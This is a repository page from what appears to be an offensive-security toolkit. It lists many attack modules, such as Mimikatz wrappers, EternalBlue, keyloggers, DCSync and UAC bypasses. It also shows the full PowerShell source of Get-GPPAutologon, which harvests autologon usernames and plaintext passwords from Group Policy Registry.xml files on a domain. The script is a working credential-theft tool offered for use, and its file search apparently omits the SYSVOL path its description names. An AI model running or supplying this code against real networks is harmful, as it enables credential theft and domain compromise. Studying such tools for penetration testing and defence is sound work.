Tree @39f6cef (Download .tar.gz)
- ..
- Brute-AD.ps1
- Brute-LocAdmin.ps1
- Bypass-UAC.ps1
- clipboard_monitor.js
- ConvertTo-Shellcode.ps1
- cred-popper.js
- Cred-Popper.ps1
- CVE-2016-9192.ps1
- Daisy.dll
- dcom.exe
- Decrypt-RDCMan.ps1
- Dump-NTDS.ps1
- Exploit-EternalBlue.ps1
- FComm.exe
- Get-ComputerInfo.ps1
- Get-CreditCardData.ps1
- Get-FirewallRules.ps1
- Get-GPPAutologon.ps1
- Get-GPPPassword.ps1
- Get-Hash.ps1
- Get-IdleTime.ps1
- Get-InjectedThread.ps1
- Get-IPConfig.ps1
- Get-Keystrokes.ps1
- Get-LAPSPasswords.ps1
- Get-LocAdm.ps1
- Get-MSHotFixes.ps1
- Get-Netstat.ps1
- Get-PassNotExp.ps1
- Get-PassPol.ps1
- Get-RecentFiles.ps1
- Get-ScreenshotAllWindows.ps1
- Get-ServicePerms.ps1
- Get-System.ps1
- Get-TokenElevationType.ps1
- Get-UserInfo.ps1
- Get-UserLogons.ps1
- Get-WLANPass.ps1
- HealthInspector.js
- HostEnum.ps1
- Inject-Shellcode.ps1
- InternalMonologue.exe
- Inveigh-Relay.ps1
- Inveigh.exe
- Inveigh.ps1
- Invoke-Arpscan.ps1
- Invoke-DaisyChain.ps1
- Invoke-DCSync.ps1
- Invoke-EDRChecker.ps1
- Invoke-EventVwrBypass.ps1
- Invoke-Hostscan.ps1
- Invoke-InveighUnprivileged.ps1
- Invoke-Kerberoast.ps1
- Invoke-Mimikatz.ps1
- Invoke-MS16-032-Proxy.ps1
- Invoke-MS16-032.ps1
- Invoke-Pbind.ps1
- Invoke-Pipekat.ps1
- Invoke-Portscan.ps1
- Invoke-PowerDump.ps1
- Invoke-PsExec.ps1
- Invoke-PSInject.ps1
- Invoke-PsUACme.ps1
- Invoke-ReflectivePEInjection.ps1
- Invoke-ReverseDnsLookup.ps1
- Invoke-RunAs.ps1
- Invoke-Shellcode.ps1
- Invoke-SMBClient.ps1
- Invoke-SMBExec.ps1
- Invoke-Sniffer.ps1
- Invoke-SqlQuery.ps1
- Invoke-Tater.ps1
- Invoke-TheHash.ps1
- Invoke-TokenManipulation.ps1
- Invoke-URLCheck.ps1
- Invoke-WinRMSession.ps1
- Invoke-WMIChecker.ps1
- Invoke-WMICommand.ps1
- Invoke-WMIEvent.ps1
- Invoke-WMIExec.ps1
- Invoke-WScriptBypassUAC.ps1
- KeePassConfig.ps1
- KeeThief.ps1
- linuxprivchecker.py
- LockLess.exe
- Logger.exe
- MiniDump.ps1
- NamedPipe.ps1
- NamedPipeDaisy.ps1
- NamedPipeProxy.ps1
- New-JScriptShell.ps1
- Orchard.js
- Out-Minidump.ps1
- PBind.exe
- PortScanner.dll
- PortScanner.ps1
- powercat.ps1
- Powermad.ps1
- PowerUp.ps1
- PowerUpSQL.ps1
- PowerUpSQL_Full.ps1
- powerview.ps1
- PowerView_dev.ps1
- PS.exe
- PwrStatusTracker.dll
- Rubeus.exe
- RunAs-NetOnly.ps1
- RunAs.exe
- RunasCs.exe
- SafetyDump.exe
- SafetyKatz.exe
- Screenshot.dll
- Seatbelt.exe
- Seatbelt.ps1
- Service-Perms.ps1
- Set-LHSTokenPrivilege.ps1
- SExec.exe
- SharpApplocker.exe
- SharpChrome.exe
- SharpCOM.exe
- SharpCookieMonster.exe
- SharpDPAPI.exe
- SharpDump.exe
- SharpEdge.exe
- SharpEDRChecker.exe
- SharPersist.exe
- SharpHound.exe
- SharpHound.ps1
- SharpLogger.exe
- SharpPrinter.exe
- SharpRoast.exe
- SharpSC.exe
- SharpSniper.exe
- SharpSocks.exe
- SharpSocks.ps1
- SharpSploit.dll
- SharpSSDP.exe
- SharpTask.exe
- SharpUp.exe
- SharpView.exe
- SharpWeb.exe
- SharpWMI.exe
- Sherlock.ps1
- Shhmon.exe
- SSLInspectionCheck.ps1
- Stage2-Core.exe
- Stage2-Core.ps1
- StandIn.exe
- SweetPotato.exe
- SwiftBelt.js
- Test-ADCredential.ps1
- TestProxy.ps1
- Watson.exe
- WExec.exe
- Zippy.ps1
Get-GPPAutologon.ps1 @39f6cef — raw · history · blame
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 | function Get-GPPAutologon
{
<#
.SYNOPSIS
Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
PowerSploit Function: Get-GPPAutologon
Author: Oddvar Moe (@oddvarmoe)
Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
.EXAMPLE
PS C:\> Get-GPPAutolgon
UserNames File Passwords
--------- ---- ---------
{administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
{NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
.EXAMPLE
PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
.LINK
https://support.microsoft.com/nb-no/kb/324737
#>
[CmdletBinding()]
Param ()
#Some XML issues between versions
Set-StrictMode -Version 2
[System.Reflection.Assembly]::LoadWithPartialName("System.Core") |Out-Null
#define helper function to parse fields from xml files
function Get-GPPInnerFields
{
[CmdletBinding()]
Param (
$File
)
try
{
$Filename = Split-Path $File -Leaf
[xml] $Xml = Get-Content ($File)
#declare empty arrays
$Password = @()
$UserName = @()
#check for password and username field
if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
{
$props = $xml.GetElementsByTagName("Properties")
foreach($prop in $props)
{
switch ($prop.name)
{
'DefaultPassword'
{
$Password += , $prop | Select-Object -ExpandProperty Value
}
'DefaultUsername'
{
$Username += , $prop | Select-Object -ExpandProperty Value
}
}
Write-Verbose "Potential password in $File"
}
#put [BLANK] in variables
if (!($Password))
{
$Password = '[BLANK]'
}
if (!($UserName))
{
$UserName = '[BLANK]'
}
#Create custom object to output results
$ObjectProperties = @{'Passwords' = $Password;
'UserNames' = $UserName;
'File' = $File}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
Write-Verbose "The password is between {} and may be more than one value."
if ($ResultsObject)
{
Return $ResultsObject
}
}
}
catch {Write-Error $Error[0]}
}
try {
#ensure that machine is domain joined and script is running as a domain account
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw 'Machine is not a domain member or User is not a member of the domain.'
}
#discover potential registry.xml containing autologon passwords
Write-Verbose 'Searching the DC. This could take a while.'
$XMlFiles = Get-ChildItem -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
if ( -not $XMlFiles ) {throw 'No preference files found.'}
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
foreach ($File in $XMLFiles) {
$Result = (Get-GppInnerFields $File.Fullname)
Write-Output $Result
}
}
catch {Write-Error $Error[0]}
}
|